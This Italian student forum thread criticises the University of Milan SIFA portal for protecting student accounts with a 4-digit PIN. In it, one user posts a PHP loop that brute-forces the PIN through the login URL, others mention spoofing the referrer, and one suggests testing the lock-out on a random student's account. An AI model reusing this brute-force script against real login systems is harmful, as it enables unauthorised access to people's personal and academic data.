 | |
Il progetto dsy.it è l'unofficial support site dei corsi di laurea del Dipartimento di Scienze dell'Informazione e del Dipartimento di Informatica e Comunicazione della Statale di Milano. E' un servizio degli studenti per gli studenti, curato in modo no-profit da un gruppo di essi. I nostri servizi comprendono aree di discussione per ogni Corso di Laurea, un'area download per lo scambio file, una raccolta di link e un motore di ricerca, il supporto agli studenti lavoratori, il forum hosting per Professori e studenti, i blog, e molto altro...
In questa sezione è indicizzato in textonly il contenuto del nostro forum |
Il PIN degli studenti...
Clicca QUI per vedere il messaggio nel forum |
| drakend |
Ho un dubbio semplice semplice: 4 cifre, solo numeriche fra l'altro, non saranno un po' poche per assicurare la riservatezza di ciascuno studente?
Attraverso la SIFA si possono fare operazioni parecchio importanti... non è certo una novità. L'Università di Milano crede forse che nel mondo siamo tutti buoni? Mah... |
| lorenzo |
| Probabilmente se viene digitato un pin errato ripetute volte il servizio viene disattivato ;) |
| fozzy |
con la lentezza dei terminali sifa.. ci vuole una vita quando sbagli PIN figurarsi mettersi a fare del brute force su un PIN.. :D
Cmq effettivamente il dubbio e' lecito.. pero' sincermaente non credo si possano combinare dei gran disastri.. piu' che altro sarebbe comodo potrelo cambiare..
Ciao, Fozzy |
| drakend |
Non posso fare niente di importante dal SIFA online?
Ci ho ridato un'occhiata di sfuggita giusto ora e posso tranquillamente iscrivermi a corsi ed esami... posso cambiare corso di laurea... posso cambiare i miei dati anagrafici... chi avrebbe eventualmente accesso saprebbe tutti i miei dati personali, incluso quanto guadagno all'anno, dove abito e via dicendo. Non sono cose da poco direi.
Non penso che sia così difficile fare un programma che tenti le 10000 possibili combinazioni di password e farlo girare da qualche pc con connessione veloce tipo fastweb.
Se c'è il blocco dell'account dello studente quando ci sono tipo più di tre tentativi di accesso senza successo è già qualcosa, ma ci dubito fortemente data la disarmante semplicità con cui è stato protetto il sistema di gestione degli studenti. |
| LoneWolf |
Originally posted by fozzy
con la lentezza dei terminali sifa.. ci vuole una vita quando sbagli PIN figurarsi mettersi a fare del brute force su un PIN.. :D
Il problema è che il SIFA è accessibile anche da internet e quindi la lentezza dei terminali conta poco... |
| lallyblue |
| tanto c'è Echelon che ci guarda............. |
| URANIO |
| Se mettevano un a password + lunga tutti l'avrebbero dimenticata!!!!!!:D |
| drakend |
x Lallyblue: che c'entra Echelon? A parte che non è servito a niente (ti dice qualcosa 11-9-2001?), ma cmq non si tratta certo di un apparato di sorveglianza a disposizione del primo venuto. Io penso che sia abbastanza scandaloso che mentre la PA stia muovendo decisi passi verso la firma digitale, in un'Università (dove c'è informatica per giunta) l'identità di uno studente sia protetta da una stupidissima password di 4 numeri.
x URANIO: l'epoca dell'utonto nell'informatica deve finire... lo hanno capito perfino nella pubblica amministrazione, ambiente in cui notoriamente le innovazioni vengono assorbite più lentamente che in qualsiasi altro settore della società. |
| lallyblue |
Originally posted by drakend
x Lallyblue: che c'entra Echelon? A parte che non è servito a niente (ti dice qualcosa 11-9-2001?), ma cmq non si tratta certo di un apparato di sorveglianza a disposizione del primo venuto. Io penso che sia abbastanza scandaloso che mentre la PA stia muovendo decisi passi verso la firma digitale, in un'Università (dove c'è informatica per giunta) l'identità di uno studente sia protetta da una stupidissima password di 4 numeri.
Che c'entra Echelon?
Beh...era un modo di dire...in fondo, oggi come oggi siamo tutti "schedati"...
Non hai mai lasciato i tuoi dati a nessuno?!? E vuoi che un bravo hackerino ha bisogno di trovare il tuo pin dell'università per avere i tuoi dati?!?
Su...hanno gabbato persino Bill Gates!!! :roll: |
| drakend |
| Lallyblue so pure io che lasciamo continuamente nostre tracce in giro per il mondo, in special modo su Internet. Se permetti però c'è una bella differenza tra cracker (quelli che citi tu sono cracker, non hacker) e lamer: i primi agiscono solo quando ci sono dietro grossi interessi (e spesso dietro pagamento), i secondi solo per il gusto di fare danni e vantarsene con gli amici. Fare un programmino che ti prova le 10000 combinazioni del pin non è per niente difficile... quindi qualche idiota che lo potrebbe fare può esserci... o vogliamo sempre affidarci alla buona fede del mondo? :) |
| URANIO |
Cmq per avere i tuoi dati forse basta una mail all'uni!:D
Per quanto riguarda le cose potenzialmente deleterie che puoi fare via sifaonline sono tutte autorizzate previa consegna di documenti cartacei!
SPERO che il sistema non si blocchi per 3 errori nella login ....immaginate uno che sbaglia apposta con le nostre matricole!!!! HAAAAAA blocca tutto! |
| URANIO |
Originally posted by drakend
Se permetti però c'è una bella differenza tra cracker (quelli che citi tu sono cracker, non hacker) e lamer: i primi agiscono solo quando ci sono dietro mondo? :)
Questa distizione (spesso usata in tv) è nata con diverse definizioni ....e spesso errate!
In realtà i cracker "dovrebbero" essere hacker che si movono senza un etica precisa e se entrano in un sistema cercano di fare il loro meglio per rovinarlo, quando un hacker invece cerca di entrare ed uscire indisturbato.
I lamer sono solo parassiti che sfruttano programmi fatti da altri per rompere le PALLE a semplici utenti!! |
| Serpico |
cmq interessante questa discussione...
a proposito di privacy, avete notato che spesso quando compilate un documento coi vs dati personali(tipo, chessò, per avere il bancomat) se scegliete di non divulgare i vostri dati vi dicono:"e no, non può, sennò non possiamo avviare la pratica"....!!!!
e quindi... la legge sulla privacy e una truffa legalizzata secondo me... |
| fozzy |
se non sbaglio devi autorizzare il trattamento dei dati, non la divulgazione.. di solito sono due le domande..
Ciao, Fozzy |
| LoneWolf |
| Infatti settimana scorsa sul giornale c'era un articolo con cui il garante della privacy denunciava la violazione della privacy delle banche... |
| Mino |
vecchia. :)
un pin di 4 cifre, con un 56k e un 386 lo sgami in una 30ina di secondi se non ci sono politiche di disabilitazione dopo x tentativi oppure un ritardo dopo l'nesimo errore. |
| Lord |
Pardon, ma come funzionerebbe un programma che provi diverse combinazioni? Ovvero: costruire un programmino in c che generi e provi vari numeri sono capace anche io. Come però inviare il numero generato al sito e "leggere" la risposta?
int main (void)
{
int n = 0; bool don't_connect = false;
while (don't_connect==false) { genera_numero(&n); don't_connect = prova_numero(&n);}
genera_danno(); 8-)
} |
| URANIO |
Probabilmente la login viene inviato attraverso un comando post o get al server .....quindi basta controllare la form e fare l'invio!
Per controllare basta vedere quello ch ti rimanda il server..almeno penso!:| |
| Mino |
isi...
se il form non fa un controllo del referrer basta un fopen in php
PHP:
$trovato = 0;
$pin = 0;
while(!$trovato) {
$url=sprintf("http://www.dominio.it/path/del/cgi?matr=123123&pin=%04d",$pin);
$pin++;
$fp = fopen($url,"r");
if (!$fp) {
echo "squaraus!";
exit(-1);
}
$line = fgets ($fp, 1024); // ecc ecc
// banalissima regexp che valuta l'output in $line cercando un pezzo di html che appare nella pagina di successo
// se lo trova pone $trovato=1
fclose($fp);
}
echo "Il pin è $pin\n";
altrimenti è altrettanto stupido, basta una fsockopen per aprire una socket su www.dominio.it alla porta 80 e quindi passare i vari parametri ("GET /path/blabla...")... |
| drakend |
Mino ma dopo tre errori l'account viene disabilitato o no?
Il referrer dovrebbe essere l'url da cui si proviene: in questa ipotesi non si può alterare la url di provenienza in modo da farla apparire "legale"? |
| Mino |
la disabilitazione dopo x tentativi non so se ci sia. lo spero vivamente...
falsificare referrer e session è una delle cose più banali che si possan fare :)
tempo fa scrissi per me uno scrippettino chiamato "enblue" per inviare sms da blu.it via shell: si loggava sulla homepage, simulava il click su "invia sms", compilava il modulo e controllava i risultati... |
| URANIO |
Secondo me non viene bloccata dopo 3 tentativi!
...se volete provare inserite una matricola a caso e provate (non la mia :D) |
| LoneWolf |
Originally posted by URANIO
Secondo me non viene bloccata dopo 3 tentativi!
...se volete provare inserite una matricola a caso e provate (non la mia :D)
Evitate anche il mio... |
|
|
|
|
